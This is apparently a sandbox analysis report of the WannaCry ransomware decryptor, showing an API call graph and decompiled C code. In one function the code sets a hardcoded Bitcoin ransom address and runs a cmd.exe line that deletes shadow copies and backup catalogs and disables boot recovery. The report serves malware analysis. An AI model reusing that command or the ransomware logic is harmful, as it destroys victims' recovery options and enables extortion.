40c9c0 2 API calls 5271->5277 5272->5276 5273->5270 5274->5270 5274->5271 5275 40cd43 #825 5274->5275 5278 40cd26 5274->5278 5275->5271 5276->5241 5279 40cd5d 5277->5279 5280 40c9c0 2 API calls 5278->5280 5279->5241 5281 40cd3b 5280->5281 5281->5241 5282->4911 5283->4911 5285 412af5 5284->5285 5286 412ac8 free 5284->5286 5285->4867 5286->5285 5320 401e60 VariantTimeToSystemTime 5288->5320 5290 401e42 5321 401de0 sprintf 5290->5321 5292 401e51 5292->4740 5294 408337 5293->5294 5295 4082fb #4278 #858 #800 5293->5295 5296 408344 5294->5296 5297 408378 time 5294->5297 5295->5294 5298 408359 #800 5296->5298 5299 40834d #1200 5296->5299 5300 40839c 5297->5300 5301 40844d time 5297->5301 5302 40828c 5298->5302 5299->5298 5300->5301 5303 4083a9 5300->5303 5301->5303 5304 408466 5301->5304 5302->4749 5302->4750 5305 4083bb 5303->5305 5306 40846c fopen 5303->5306 5304->5306 5307 4083c4 #540 time #2818 #1200 #800 5305->5307 5308 40842e #800 5305->5308 5309 4084b5 fread fclose 5306->5309 5310 408496 #800 5306->5310 5307->5308 5308->5302 5322 40be90 strncpy strncpy strncpy 5309->5322 5310->5302 5312 4084e7 5323 40c060 5312->5323 5314 408501 5315 408516 5314->5315 5316 408538 5314->5316 5317 408549 #800 5315->5317 5318 40851a #1200 time 5315->5318 5316->5317 5319 40853c #1200 5316->5319 5317->5302 5318->5317 5319->5317 5320->5290 5321->5292 5322->5312 5324 40c07f 5323->5324 5325 40bed0 110 API calls 5324->5325 5326 40c0ba 5325->5326 5327 40c0c1 5326->5327 5328 40c0e7 5326->5328 5329 40c0cc SendMessageA 5327->5329 5347 40c0db 5327->5347 5330 40c104 5328->5330 5331 40c0f8 SendMessageA 5328->5331 5329->5347 5332 40dd00 4 API calls 5330->5332 5331->5330 5335 40c116 5332->5335 5333 40dbf0 free 5334 40c173 5333->5334 5334->5314 5336 40c144 5335->5336 5337 40c17b 5335->5337 5338 40c154 5336->5338 5339 40c148 SendMessageA 5336->5339 5340 40c18b 5337->5340 5341 40c17f SendMessageA 5337->5341 5342 40dbf0 free 5338->5342 5339->5338 5343 40c1b4 5340->5343 5344 40c1e8 5340->5344 5341->5340 5342->5334 5345 40c1c4 5343->5345 5346 40c1b8 SendMessageA 5343->5346 5344->5347 5348 40c1f5 SendMessageA 5344->5348 5349 40dbf0 free 5345->5349 5346->5345 5347->5333 5348->5347 5349->5334 5351 4076d9 time 5350->5351 5352 4076d7 5351->5352 5352->5351 5353 407771 sprintf 5352->5353 5354 405180 4 API calls 5352->5354 5355 407842 SendMessageA SendMessageA #540 5352->5355 5353->5352 5354->5352 5356 407894 5355->5356 5357 4078aa _ftol #2818 #2818 5356->5357 5358 4078db #2818 #2818 5356->5358 5359 407911 #3092 #6199 5357->5359 5358->5359 5360 407990 #800 5359->5360 5361 407940 5359->5361 5360->4758 5361->5360 5362 407952 InvalidateRect 5361->5362 5363 405920 2 API calls 5362->5363 5364 407978 5363->5364 5365 405920 2 API calls 5364->5365 5365->5360 5366->4784 5367->4786 5368->4788 5392 4044c0 5369->5392 5372 404210 #858 #800 5372->4792 5396 405950 InvalidateRect 5373->5396 5375 40592d 5397 405970 InvalidateRect 5375->5397 5377 40593e 5378 405860 5377->5378 5379 405872 5378->5379 5380 405875 GetClientRect #6197 5378->5380 5379->5380 5380->4797 5382 4058d2 5381->5382 5383 4058d5 GetClientRect #6197 5381->5383 5382->5383 5383->4799 5385 4051f8 5384->5385 5386 40519e #860 5384->5386 5385->4801 5387 4051b1 5386->5387 5388 4051d1 RedrawWindow 5387->5388 5389 4051ea InvalidateRect 5387->5389 5388->4801 5389->5385 5390->4811 5391->4813 5393 4044f8 GetObjectA CreateFontIndirectA #1641 5392->5393 5394 4044ce GetParent #2864 SendMessageA #2860 5392->5394 5395 40427a #2818 #535 5393->5395 5394->5393 5394->5395 5395->5372 5396->5375 5397->5377 5399 406b88 #537 #924 sprintf #800 #800 5398->5399 5400 406bda 5398->5400 5399->5400 5403 406cf0 5400->5403 5402 406be6 #800 5402->4822 5404 406d16 5403->5404 5405 406d19 SendMessageA #353 SendMessageA #1979 5403->5405 5404->5405 5408 406dc0 SendMessageA #823 5405->5408 5409 406e00 SendMessageA 5408->5409 5410 406d7b #665 5408->5410 5412 406ed2 #825 5409->5412 5413 406e2f _strnicmp 5409->5413 5410->5402 5412->5410 5414 406e4b _strnicmp 5413->5414 5415 406e67 5413->5415 5414->5415 5415->5412 5415->5413 5416 406e87 SendMessageA #6136 5415->5416 5416->5415 6153 4019d0 EnableWindow 6154 4059d0 #561 6155 404dd0 6 API calls 6156 404e3b SendMessageA #3092 6155->6156 6158 404e60 SendMessageA #3092 6156->6158 6160 404e93 SendMessageA 6158->6160 6161 404e7f SendMessageA 6158->6161 6565 40dbd0 6566 40dbf0 free 6565->6566 6567 40dbd8 6566->6567 6568 40dbe8 6567->6568 6569 40dbdf #825 6567->6569 6569->6568 6379 4102d0 free 5930 4130d4 ??1type_info@@UAE 5931 4130e3 #825 5930->5931 5932 4130ea 5930->5932 5931->5932 5934 4068e0 5935 4068ef 5934->5935 5936 40691a #5280 5935->5936 5937 4068fc 5935->5937 5529 4043e0 #4284 #3874 #5277 5933 40a0e0 Escape 6380 4086e0 #470 GetClientRect SendMessageA #6734 #323 6381 408765 6380->6381 6382 408838 6381->6382 6385 4087bd CreateCompatibleDC #1640 6381->6385 6383 408885 #2754 6382->6383 6384 408869 FillRect 6382->6384 6386 408897 #2381 6383->6386 6384->6386 6412 409e70 CreateCompatibleBitmap #1641 6385->6412 6389 4088b4 6386->6389 6390 408a7d 6386->6390 6389->6390 6392 4088be #3797 6389->6392 6394 409f80 BitBlt 6390->6394 6408 408a5e 6390->6408 6391 408809 6413 409f10 6391->6413 6395 408901 _ftol 6392->6395 6397 408abe 6394->6397 6402 40895e _ftol 6395->6402 6404 40897e 6395->6404 6396 408817 #6194 6396->6382 6399 408ad5 #5785 6397->6399 6400 408ac6 #5785 6397->6400 6399->6408 6400->6408 6402->6404 6403 408afe #640 #755 6405 4089a7 FillRect 6404->6405 6406 4089b8 FillRect 6404->6406 6407 4089ca 6404->6407 6405->6407 6406->6407 6407->6408 6416 409f80 6407->6416 6419 409e20 #2414 6408->6419 6410 408a50 6411 409f10 2 API calls 6410->6411 6411->6408 6412->6391 6414 409f25 #5785 6413->6414 6415 409f18 #5785 6413->6415 6414->6396 6415->6396 6417 409f88 6416->6417 6418 409f8b BitBlt 6416->6418 6417->6418 6418->6410 6419->6403 6420 40c6e0 6421 40c722 #825 6420->6421 6422 40c6ef 6420->6422 6423 40c7b0 #825 6422->6423 6424 40c70d #825 6423->6424 6424->6422 6425 40c721 6424->6425 6425->6421 6583 40cfe0 6590 40d4c0 6583->6590 6585 40cffb 6586 40d4c0 4 API calls 6585->6586 6589 40d05e 6585->6589 6587 40d031 6586->6587 6588 40d4c0 4 API calls 6587->6588 6587->6589 6588->6589 6591 40d4d0 6590->6591 6592 40d4d9 6590->6592 6591->6585 6593 40d4e4 6592->6593 6594 40d4ee time 6592->6594 6593->6585 6595 40d575 6594->6595 6598 40d50a 6594->6598 6596 40d58a 6595->6596 6597 40d2b0 memmove 6595->6597 6596->6585 6597->6596 6598->6595 6599 40d569 time 6598->6599 6600 40d551 Sleep 6598->6600 6599->6595 6599->6598 6600->6598 6574 404fe0 #6334 6575 404ff4 #4853 6574->6575 6576 404ffb 6574->6576 6575->6576 6174 405df0 6179 405d90 #654 #765 6174->6179 6176 405df8 6177 405e08 6176->6177 6178 405dff #825 6176->6178 6178->6177 6179->6176 5938 4090f0 5939 409124 #540 #3874 5938->5939 5940 40971e 5938->5940 5941 409185 5939->5941 5942 40915e 5939->5942 5943 40919c _ftol 5941->5943 5944 40918e #860 5941->5944 5945 40917c 5942->5945 5948 40916e #860 5942->5948 5943->5945 5944->5943 5946 4091d5 SendMessageA #2860 5945->5946 5947 40970a #800 5945->5947 5949 409208 5946->5949 5947->5940 5948->5945 5964 409870 5949->5964 5951 409232 #5875 #6170 GetWindowOrgEx #540 #2818 5953 409329 GetObjectA 5951->5953 5954 40935b GetTextExtentPoint32A 5951->5954 5953->5954 5956 40938b GetViewportOrgEx 5954->5956 5962 409411 5956->5962 5957 409630 #800 5958 409662 5957->5958 5959 40965a #6170 5957->5959 5960 409685 #2414 #2414 5958->5960 5961 40967d #5875 5958->5961 5959->5958 5960->5947 5961->5960 5962->5957 5965 409880 #2414 5964->5965 5965->5951 6426 406ef0 6427 406f03 #823 6426->6427 6428 406f6a 6426->6428 6427->6428 6429 406f25 SendMessageA ShellExecuteA #825 6427->6429 6429->6428 6163 4011f0 6164 40120b #5280 6163->6164 6165 4011fd 6163->6165 6165->6164 6166 401203 6165->6166 6167 4019f0 #765 6168 401a08 6167->6168 6169 4019ff #825 6167->6169 6169->6168 6170 4059f0 6171 4059f8 6170->6171 6172 405a08 6171->6172 6173 4059ff #825 6171->6173 6173->6172 6601 4067f0 IsIconic 6602 406808 7 API calls 6601->6602 6603 40689a #2379 6601->6603 6604 409ff0 ExtTextOutA 5967 405080 5972 4050a0 #800 #795 5967->5972 5969 405088 5970 405098 5969->5970 5971 40508f #825 5969->5971 5971->5970 5972->5969 5973 40d880 5976 40d0a0 time srand rand 5973->5976 5975 40d88f 5977 40d0e1 5976->5977 5978 40d0d3 rand 5976->5978 5977->5975 5978->5977 5978->5978 6180 403180 6185 4031a0 #2414 #2414 #616 #693 #641 6180->6185 6182 403188 6183 403198 6182->6183 6184 40318f #825 6182->6184 6184->6183 6185->6182 6186 405580 GetClientRect 6187 4055c7 7 API calls 6186->6187 6188 4057c9 6186->6188 6189 405666 6187->6189 6190 405669 #5785 CreateSolidBrush FillRect 6187->6190 6189->6190 6191 405770 6 API calls 6190->6191 6194 4056b2 6190->6194 6191->6188 6193 4056cd BitBlt 6193->6194 6194->6191 6194->6193 6195 408580 #609 6196 408598 6195->6196 6197 40858f #825 6195->6197 6197->6196 6431 404280 6432 404290 6431->6432 6433 40428b 6431->6433 6435 4042a0 #6663 6432->6435 6436 4042fd #2379 6432->6436 6434 404530 5 API calls 6433->6434 6434->6432 6437 4042b5 GetParent #2864 SendMessageA #2379 6435->6437 6438 4042e7 ShellExecuteA 6435->6438 6438->6436 6605 406380 6610 405e10 #2414 #2414 #2414 #2414 6605->6610 6607 406388 6608 406398 6607->6608 6609 40638f #825 6607->6609 6609->6608 6639 403f20 #2414 6610->6639 6612 405ed6 6640 403f20 #2414 6612->6640 6614 405eec 6641 403f20 #2414 6614->6641 6616 405f02 6642 403f20 #2414 6616->6642 6618 405f18 #2414 6643 403f20 #2414 6618->6643 6620 405f50 6644 403f20 #2414 6620->6644 6622 405f66 6645 403f20 #2414 6622->6645 6624 405f7c 6 API calls 6646 4050a0 #800 #795 6624->6646 6626 405ffe 6647 4050a0 #800 #795 6626->6647 6628 40600e 6648 404170 #2414 #800 #800 #795 6628->6648 6630 40601e 6649 404170 #2414 #800 #800 #795 6630->6649 6632 40602e 6650 404170 #2414 #800 #800 #795 6632->6650 6634 40603e 6651 404170 #2414 #800 #800 #795 6634->6651 6636 40604e #654 #765 6652 405d90 #654 #765 6636->6652 6638 406087 #609 #609 #616 #641 6638->6607 6639->6612 6640->6614 6641->6616 6642->6618 6643->6620 6644->6622 6645->6624 6646->6626 6647->6628 6648->6630 6649->6632 6650->6634 6651->6636 6652->6638 6653 409b80 6654 409b99 6653->6654 6655 409ba5 #2379 6654->6655 6656 409b9d 6654->6656 6657 40db80 recv 5519 407a90 5520 407bf4 #2385 5519->5520 5521 407abd 5519->5521 5521->5520 5528 404c40 #324 #540 #860 5521->5528 5523 407ae2 #2514 5524 407b72 #2414 #2414 #800 #641 5523->5524 5525 407afb 6 API calls 5523->5525 5524->5520 5526 4082c0 141 API calls 5525->5526 5527 407b61 #800 5526->5527 5527->5524 5528->5523 6198 404d90 #2370 #2289 5979 401091 5984 4010c0 #765 #641 5979->5984 5981 4010a8 5982 4010b8 5981->5982 5983 4010af #825 5981->5983 5983->5982 5984->5981 6439 414290 #825 6217 4085a0 #781 6218 4085b8 6217->6218 6219 4085af #825 6217->6219 6219->6218 5530 4063a0 15 API calls 6002 4034a0 6 API calls 6203 4035a0 SendMessageA 6204 4035e5 OpenClipboard 6203->6204 6205 4037e9 6203->6205 6204->6205 6206 4035f7 SendMessageA 6204->6206 6207 403681 GlobalAlloc 6206->6207 6208 40360f #3301 #924 #800 #800 SendMessageA 6206->6208 6209 4037e3 CloseClipboard 6207->6209 6210 40369b GlobalLock 6207->6210 6208->6207 6208->6208 6209->6205 6211 4036b6 SendMessageA 6210->6211 6212 4036aa GlobalFree 6210->6212 6213 4037c3 GlobalUnlock EmptyClipboard SetClipboardData 6211->6213 6214 4036d6 8 API calls 6211->6214 6212->6209 6213->6209 6216 4037bf 6214->6216 6216->6213 5985 4098a0 5990 4097e0 5985->5990 5987 4098a8 5988 4098b8 5987->5988 5989 4098af #825 5987->5989 5989->5988 5991 409815 5990->5991 5992 40981e #2414 #2414 5990->5992 5991->5992 5992->5987 5993 40a0a0 5994 40a0a8 5993->5994 5995 40a0ab GrayStringA 5993->5995 5994->5995 6450 40d6a0 htons socket 6451 40d6f3 bind 6450->6451 6452 40d814 6450->6452 6453 40d717 ioctlsocket 6451->6453 6454 40d809 6451->6454 6453->6454 6455 40d732 connect select 6453->6455 6454->6452 6456 40d80d closesocket 6454->6456 6455->6454 6457 40d78b __WSAFDIsSet 6455->6457 6456->6452 6458 40d79a __WSAFDIsSet 6457->6458 6459 40d7ac ioctlsocket setsockopt setsockopt 6457->6459 6458->6454 6458->6459 6446 40c6a0 6447 40c6aa 6446->6447 6449 40c6b8 6446->6449 6448 40c6be #825 6447->6448 6447->6449 6448->6449 6460 404aa3 6461 404ab1 6460->6461 6462 404aaa GlobalFree 6460->6462 6463 404ac0 6461->6463 6464 404ab9 CloseHandle 6461->6464 6462->6461 6464->6463 6003 407cb0 6006 4030e0 #324 #567 #567 6003->6006 6005 407cd6 6 API calls 6006->6005 6220 407db0 6227 401000 #324 #567 6220->6227 6222 407dd7 time 6223 407e09 #2514 6222->6223 6224 407dfe 6222->6224 6225 407e34 #765 #641 6223->6225 6226 407e28 time 6223->6226 6224->6223 6226->6225 6227->6222 6465 40ceb0 6466 40cebc 6465->6466 6467 4130bb 2 API calls 6466->6467 6468 40ceda 6467->6468 6470 4102b0 calloc

                                                      Executed Functions

                                                      Function 004064D0 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 256stringwindowtimeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 71%
                                                      			E004064D0(intOrPtr __ecx, void* __fp0) {
				char _v1032;
				char _v1424;
				void _v2256;
				void _v2456;
				void _v2707;
				char _v2708;
				intOrPtr _v2720;
				short _v2724;
				int _t48;
				int _t49;
				intOrPtr* _t50;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				short _t70;
				void* _t82;
				char* _t87;
				char* _t89;
				intOrPtr _t90;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t105;
				char _t122;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t142;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				void* _t165;
				void* _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t201;

				_t201 = __fp0;
				_t90 = __ecx; // executed
				L00412CB0(); // executed
				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
				_t48 = E00401C70(0);
				_t170 = _t169 + 4;
				if(_t48 == 0) {
					_t122 =  *0x421798; // 0x0
					_v2708 = _t122;
					memset( &_v2707, _t48, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetModuleFileNameA(0,  &_v2708, 0x104);
					_t87 = strrchr( &_v2708, 0x5c);
					_t170 = _t170 + 0x14;
					if(_t87 != 0) {
						_t89 = strrchr( &_v2708, 0x5c);
						_t170 = _t170 + 8;
						 *_t89 = 0;
					}
					SetCurrentDirectoryA( &_v2708);
				}
				_t167 = _t90 + 0x50c;
				_t49 = E00401A10(_t167, 1);
				_t171 = _t170 + 8;
				if(_t49 == 0) {
					memset(_t167, _t49, 0xc3 << 2);
					asm("repne scasb");
					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
					 *(_t90 + 0x588) = 0;
					__imp__time(0);
					 *(_t90 + 0x578) = _t82;
					E00401A10(_t167, 0);
					_t171 = _t171 + 0x30;
				}
				_t50 = E00402C40();
				__imp__#115(0x202,  &_v1424); // executed
				__imp____p___argc();
				if( *_t50 > 1) {
					_t168 = __imp____p___argv;
					_t140 = "fi";
					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
					while(1) {
						_t98 =  *_t161;
						_t60 = _t98;
						if(_t98 !=  *_t140) {
							break;
						}
						if(_t60 == 0) {
							L12:
							_t60 = 0;
						} else {
							_t136 =  *((intOrPtr*)(_t161 + 1));
							_t22 = _t140 + 1; // 0x31000069
							_t60 = _t136;
							if(_t136 !=  *_t22) {
								break;
							} else {
								_t161 = _t161 + 2;
								_t140 = _t140 + 2;
								if(_t60 != 0) {
									continue;
								} else {
									goto L12;
								}
							}
						}
						L14:
						if(_t60 == 0) {
							E00407F80(_t90);
							ExitProcess(0);
						}
						_t141 = "co";
						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
						while(1) {
							_t99 =  *_t162;
							_t63 = _t99;
							if(_t99 !=  *_t141) {
								break;
							}
							if(_t63 == 0) {
								L21:
								_t63 = 0;
							} else {
								_t135 =  *((intOrPtr*)(_t162 + 1));
								_t25 = _t141 + 1; // 0x6600006f
								_t63 = _t135;
								if(_t135 !=  *_t25) {
									break;
								} else {
									_t162 = _t162 + 2;
									_t141 = _t141 + 2;
									if(_t63 != 0) {
										continue;
									} else {
										goto L21;
									}
								}
							}
							L23:
							if(_t63 == 0) {
								E004080C0(_t90);
								ExitProcess(0);
							}
							_t142 = "vs";
							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
							while(1) {
								_t100 =  *_t163;
								_t66 = _t100;
								if(_t100 !=  *_t142) {
									break;
								}
								if(_t66 == 0) {
									L30:
									_t66 = 0;
								} else {
									_t134 =  *((intOrPtr*)(_t163 + 1));
									_t28 = _t142 + 1; // 0x63000073
									_t66 = _t134;
									if(_t134 !=  *_t28) {
										break;
									} else {
										_t163 = _t163 + 2;
										_t142 = _t142 + 2;
										if(_t66 != 0) {
											continue;
										} else {
											goto L30;
										}
									}
								}
								L32:
								if(_t66 == 0) {
									Sleep(0x2710); // executed
									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
									_t70 = "cmd.exe"; // 0x2e646d63
									_t105 =  *0x420fd4; // 0x657865
									_v2724 = _t70;
									_v2720 = _t105;
									if(E00401BB0() != 0) {
										_push( &_v2456);
										_push( &_v2724);
										sprintf( &_v1032, "%s %s");
										E00401A90( &_v1032, 0, 0);
									} else {
										E00401B50( &_v2724,  &_v2456, _t71);
									}
									ExitProcess(0); // executed
								}
								goto L37;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L32;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L23;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L14;
				}
				L37:
				E00407E80();
				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0");
				E00406F80(_t90, _t201);
				E00406C20(_t90);
				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0);
				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0);
				 *0x42189c = _t90;
				return 1;
			}











































                                                      0x004064d0
                                                      0x004064da
                                                      0x004064dc
                                                      0x004064f9
                                                      0x0040650d
                                                      0x00406511
                                                      0x00406516
                                                      0x0040651b
                                                      0x0040651d
                                                      0x00406527
                                                      0x00406530
                                                      0x00406532
                                                      0x00406540
                                                      0x00406541
                                                      0x00406554
                                                      0x00406556
                                                      0x0040655b
                                                      0x00406564
                                                      0x00406566
                                                      0x00406569
                                                      0x00406569
                                                      0x00406571
                                                      0x00406571
                                                      0x00406577
                                                      0x00406580
                                                      0x00406585
                                                      0x0040658a
                                                      0x00406593
                                                      0x0040659d
                                                      0x004065ab
                                                      0x004065bb
                                                      0x004065bd
                                                      0x004065c7
                                                      0x004065d1
                                                      0x004065da
                                                      0x004065e0
                                                      0x004065e5
                                                      0x004065e5
                                                      0x004065e8
                                                      0x004065fa
                                                      0x00406600
                                                      0x00406609
                                                      0x0040660f
                                                      0x00406615
                                                      0x0040661e
                                                      0x00406621
                                                      0x00406621
                                                      0x00406625
                                                      0x00406629
                                                      0x00000000
                                                      0x00000000
                                                      0x0040662d
                                                      0x00406645
                                                      0x00406645
                                                      0x0040662f
                                                      0x0040662f
                                                      0x00406632
                                                      0x00406635
                                                      0x00406639
                                                      0x00000000
                                                      0x0040663b
                                                      0x0040663b
                                                      0x0040663e
                                                      0x00406643
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406643
                                                      0x00406639
                                                      0x0040664e
                                                      0x00406650
                                                      0x00406654
                                                      0x0040665b
                                                      0x0040665b
                                                      0x00406661
                                                      0x0040666a
                                                      0x0040666d
                                                      0x0040666d
                                                      0x00406671
                                                      0x00406675
                                                      0x00000000
                                                      0x00000000
                                                      0x00406679
                                                      0x00406691
                                                      0x00406691
                                                      0x0040667b
                                                      0x0040667b
                                                      0x0040667e
                                                      0x00406681
                                                      0x00406685
                                                      0x00000000
                                                      0x00406687
                                                      0x00406687
                                                      0x0040668a
                                                      0x0040668f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040668f
                                                      0x00406685
                                                      0x0040669a
                                                      0x0040669c
                                                      0x004066a0
                                                      0x004066a7
                                                      0x004066a7
                                                      0x004066ad
                                                      0x004066b6
                                                      0x004066b9
                                                      0x004066b9
                                                      0x004066bd
                                                      0x004066c1
                                                      0x00000000
                                                      0x00000000
                                                      0x004066c5
                                                      0x004066dd
                                                      0x004066dd
                                                      0x004066c7
                                                      0x004066c7
                                                      0x004066ca
                                                      0x004066cd
                                                      0x004066d1
                                                      0x00000000
                                                      0x004066d3
                                                      0x004066d3
                                                      0x004066d6
                                                      0x004066db
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004066db
                                                      0x004066d1
                                                      0x004066e6
                                                      0x004066e8
                                                      0x004066f3
                                                      0x0040671a
                                                      0x0040671c
                                                      0x00406721
                                                      0x00406727
                                                      0x0040672b
                                                      0x00406736
                                                      0x0040675b
                                                      0x0040675c
                                                      0x0040676a
                                                      0x0040677c
                                                      0x00406738
                                                      0x00406746
                                                      0x0040674b
                                                      0x00406786
                                                      0x00406786
                                                      0x00000000
                                                      0x004066e8
                                                      0x004066e1
                                                      0x004066e3
                                                      0x00000000
                                                      0x004066e3
                                                      0x00406695
                                                      0x00406697
                                                      0x00000000
                                                      0x00406697
                                                      0x00406649
                                                      0x0040664b
                                                      0x00000000
                                                      0x0040664b
                                                      0x0040678c
                                                      0x0040678e
                                                      0x0040679c
                                                      0x004067a4
                                                      0x004067ab
                                                      0x004067c6
                                                      0x004067d8
                                                      0x004067dc
                                                      0x004067ef

                                                      APIs
                                                      • #4710.MFC42 ref: 004064DC
                                                      • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                                      • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                                        • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                                        • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                        • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                        • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                        • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                                      • strrchr.MSVCRT ref: 00406554
                                                      • strrchr.MSVCRT ref: 00406564
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                                      • time.MSVCRT ref: 004065D1
                                                      • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                                      • __p___argv.MSVCRT ref: 0040661A
                                                      • ExitProcess.KERNEL32 ref: 0040665B
                                                      • __p___argv.MSVCRT ref: 00406666
                                                      • ExitProcess.KERNEL32 ref: 004066A7
                                                      • __p___argv.MSVCRT ref: 004066B2
                                                      • Sleep.KERNELBASE(00002710), ref: 004066F3
                                                      • sprintf.MSVCRT ref: 0040676A
                                                      • ExitProcess.KERNEL32 ref: 00406786
                                                      • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                                      • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                                      Strings
                                                      • %s %s, xrefs: 00406764
                                                      • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                                      • cmd.exe, xrefs: 0040671C
                                                      • Wana Decrypt0r 2.0, xrefs: 00406796
                                                      • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                                      • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                                      • API String ID: 623806192-606506946
                                                      • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                                      • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004060E0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 139windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 84%
                                                      			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				struct HINSTANCE__* _t82;
				struct HICON__* _t83;
				intOrPtr _t119;
				intOrPtr _t124;

				_push(0xffffffff);
				_push(E00413E0B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				_push(__ecx);
				_t119 = __ecx;
				_push(_a4);
				_push(0x66);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
				_v12 = 2;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
				_v12 = 3;
				E004085C0(__ecx + 0x120);
				_v12 = 4;
				E004085C0(__ecx + 0x1a4);
				_v12 = 5;
				E00404090(__ecx + 0x228);
				_v12 = 6;
				E00404090(__ecx + 0x290);
				_v12 = 7;
				E00404090(__ecx + 0x2f8);
				_v12 = 8;
				E00404090(__ecx + 0x360);
				_v12 = 9;
				E00405000(__ecx + 0x3c8);
				_v12 = 0xa;
				E00405000(__ecx + 0x444);
				_v12 = 0xb;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
